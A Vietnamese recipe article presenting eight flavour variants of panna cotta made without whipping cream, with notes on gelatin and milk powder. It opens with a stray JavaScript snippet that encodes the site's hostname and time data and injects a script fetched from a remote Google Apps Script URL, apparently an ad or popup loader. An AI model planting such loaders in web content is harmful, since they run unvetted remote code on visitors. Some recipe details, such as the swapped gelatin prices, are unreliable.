var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách Làm Panna Cotta Không Cần Whipping Cream Ngon Như Hàng

Panna cotta (tiếng Ý có nghĩa là “kem nấu chín”) là một món ngọt của Ý nấu whipping cream, sữa và đường với gelatin rồi đợi cho hỗn hợp đông lại. Món này có nguồn gốc ở Piedmont và được làm từ whipping cream-kem, gelatin và đường. Có nhiều phiên bản và hương liệu khác nhau. Vị ngọt tinh tế, kết cấu mịn và cách trang trí trang nhã khiến nó trở thành một món ăn hoàn hảo vào cuối bữa ăn. Món ăn lâu đời, được biến tấu bằng nhiều cách chế biến khác nhau. Thucpham.com mách bạn cách làm panna cotta không cần whipping cream chuẩn nhà hàng, thơm ngon dễ làm qua bài viết sau đây.

Panna cotta là một trong những món tráng miệng phổ biến nhất được ăn bằng thìa. Cách làm Panna Cotta không cần whipping cream là một món ngọt hoàn hảo cho những người sành ăn và bạn không cần lo lắng về vóc dáng của mình rồi. Cùng Thucpham.com bắt tay làm ngay món panna cotta thơm ngon dễ làm.

8 Cách Làm Panna Cotta Không Cần Whipping Cream Với 8 Vị Hot Nhất Hiện Nay

Cách Làm Panna Cotta Socola

Cách làm panna cotta không cần whipping cream đầu tiên thucpham.com muốn giới thiệu đến các bạn chính là bánh panna cotta socola đầy quyến rũ. Món bánh ngọt mát, bổ dưỡng là một gợi ý hoàn hảo để đổi gió cho mùa hè nóng bức.

Nguyên liệu

  • Nước lọc: 180ml
  • Sữa tươi không đường: 180ml
  • Bột sữa: 40g
  • Bột Socola: 12g
  • Gelatin: 6g
  • Đường: 20g
  • Topping: hoa quả các loại

Các bước thực hiện

Bước 1: Ngâm 6g Gelatin với một chút nước để hỗn hợp nghỉ trong 15 phút.

Bước 2: Cho 180ml nước lọc, 180ml sữa tươi không đường, 6g gelatin đã ngâm, 20g đường trắng, 40g bột sữa và 12g bột socola vào âu to khuấy đều các nguyên liệu.

Bước 3: Cho hỗn hợp vào nồi đun ở lửa nhỏ khuấy đều tay khi hỗn hợp hòa đều, đun tới 70-80 độ bốc hơi là được.

Bước 4: Chia hỗn hợp vào các cốc nhỏ để nguội rồi cho vào tủ lạnh.

Bước 5: Bạn lấy một con dao, mũi nhọn khoét một đường quanh mép panna cotta, úp ngược ra đĩa và thêm chút bột socola hoặc hoa quả lên trên và thưởng thức.

Panna Cotta Socola

Xem video cách làm panna cotta socola tại đây

Cách Làm Panna Cotta Xoài

Panna Cotta Xoài với sự pha trộn giữa vị sữa, xoài và hoa quả siro vô cùng bắt mắt, hấp dẫn. Với nhân viên làm bánh hoặc bất kỳ ai yêu thích làm bánh thì công thức này sẽ giúp bạn trổ tài khéo léo, cho ra món ăn mới lạ, kích thích vị giác.

Panna Cotta Xoài

Xem video cách làm bánh panna cotta xoài tại đây

Cách Làm Panna Cotta Việt Quất

Khác với Panna Cotta truyền thống, Panna Cotta Việt Quất với vị chua chua, mát mịn sẽ đem đến cho bạn một món tráng miệng cực kì hấp dẫn.

Panna Cotta Việt Quất

Xem video cách làm bánh panna cotta việt quất tại đây

Cách Làm Panna Cotta Sầu Riêng

Cùng phá cách một chút với Panna Cotta Việt Quất, món ăn ngọt thơm, mềm mịn và mát lịm sẽ là một trong những món bạn nên thử đấy.

Panna Cotta Sầu Riêng

Xem video cách làm bánh panna cotta sầu riêng tại đây

Cách Làm Panna Cotta Matcha

Nếu bạn là tín đồ của hương matcha quyến rũ thì hẳn là không thể bỏ qua món panna cotta làm từ bột matcha thơm ngon khó cưỡng này. Với cách làm siêu đơn giản và nhanh gọn này bạn sẽ được thưởng thức món panna cotta matcha thanh thanh, mát lạnh, ngon không đâu sánh bằng.

Panna Cotta Matcha

Xem video cách làm bánh panna cotta matcha tại đây

Cách Làm Panna Cotta Khoai Môn

Panna Cotta Khoai Môn là sự kết hợp hoàn hảo giữa các nguyên liệu như bột sữa, ngọt bùi khoai môn, gelatin và topping, tạo nên một món ăn tráng miệng đẹp mắt, hương vị thơm ngon.

Panna Cotta Khoai Môn

Xem video cách làm bánh panna cotta khoai môn tại đây

Cách Làm Panna Cotta Dâu

Một cốc Panna Cotta Dâu mát lạnh, nguyên liệu lại dễ tìm ngon đảm bảo. Cách làm panna cotta dâu lại dễ vô cùng. Chắc chắn mọi người trong gia đình bạn sẽ thích mê cho mà xem.

Panna Cotta Dâu

Xem video cách làm bánh panna cotta dâu tại đây

Cách Panna Cotta Bạc Hà

Panna cotta bạc hà mát lạnh cùng hương vị ngọt ngào, mềm mại của từng miếng bánh được ăn chắc hẳn sẽ là một trong những điều khiến cho panna cotta bạc hà ngày càng trở nên đặc biệt trong lòng mọi người.

Panna Cotta Bạc Hà

Xem video cách làm bánh panna cotta bạc hà tại đây

Như vậy là chúng ta đã hiểu và thực hành xong cách làm panna cotta không whipping cream rồi. Công việc tiếp theo của chúng ta là thưởng thức thành quả thôi. Panna cotta vị ngọt tinh tế, kết cấu mịn kết hợp cùng topping, sốt phủ phong phú khiến nó trở thành một món ăn hoàn hảo vào cuối bữa ăn.

Cần Biết Về Gelatin Và Mua Ở Đâu?

Gelatin chính là chất tạo động, được tạo ra nhờ quy trình chiết xuất ở phía dưới da, xương của động vật hoặc từ thực vật. Gelatin có 2 dạng lá và bột thường được dùng trong làm bánh, làm thạch hoa quả, làm kẹo dẻo,… Loại Gelatin bột thường được các đầu bếp sử dụng vì dễ ước lượng tỉ lệ nước trong làm bánh. Giá của gelatin dạng lá vào khoảng từ 350.000 đến 380.000 VNĐ/1kg, trong khi dạng bột khoảng 5.000 đến 7.000 VNĐ/lá.

Có rất loại hãng sản xuất gelatin, và có thể mua dễ dàng trên các trang thương mại điện tử, tuy nhiên hãy chọn loại có bao bì xuất xứ để đảm bảo an toàn cho sức khỏe cho gia đình bạn nhé.

Cần Biết Về Bột Sữa Và Mua Ở Đâu?

Bột sữa hay còn gọi là bột kem béo hoặc bột béo được sản xuất từ động vật hoặc thực vật. Bột sữa thường được sản xuất và bày bán dạng bột mịn, có màu trắng kem. Ưu điểm của bột sữa là dễ bảo quản, có độ béo cao, hương thơm, dễ hòa tan trong nước dùng làm nguyên liệu trong làm bánh, nấu chè và pha chế.

Nếu bạn chưa biết mua bột sữa ở đâu chất lượng thì Thucpham.com chia sẻ đến bạn các cửa hàng tạp hóa, đại lý bán lẻ có thương hiệu để chọn mua được sản phẩm có nhãn mác bao bì nhà sản xuất để cho món ăn ngon và đảm bảo nhé!